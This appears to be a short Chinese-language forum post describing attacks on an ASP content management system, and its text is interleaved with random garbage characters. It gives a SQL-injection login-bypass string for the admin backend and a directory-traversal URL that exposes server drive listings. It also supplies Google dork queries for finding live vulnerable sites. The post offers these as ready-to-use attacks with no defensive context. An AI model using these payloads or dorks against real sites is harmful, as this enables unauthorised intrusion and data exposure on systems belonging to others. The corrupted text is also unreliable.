后台万能密码 'or'='or'" Q4 D6 C% j/ S4 t% ^. P. m
' A9 _1 ]( i. H$ L* P" j, G$ M. h后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!/ \+ Q! w z& K# X
admin/uploadfile.asp?currentFolder=/upfiles/../
/ Q; E t7 ?$ s# Z5 j9 U* k% ?$ L' [/ D) M( v8 c( Y* O p% o* t
漏洞证明:# G2 X3 w4 c6 y T2 g% q
$ }$ `$ ]6 L: V9 z
谷歌:inurl:type.asp?id=1 新闻中心
. u3 @: E* [2 p" s# N" B4 f( ^或者 :inurl:download_ok.asp?
( g: @. `4 ^, r+ B- x9 T# |( m* Y# c Y, |
|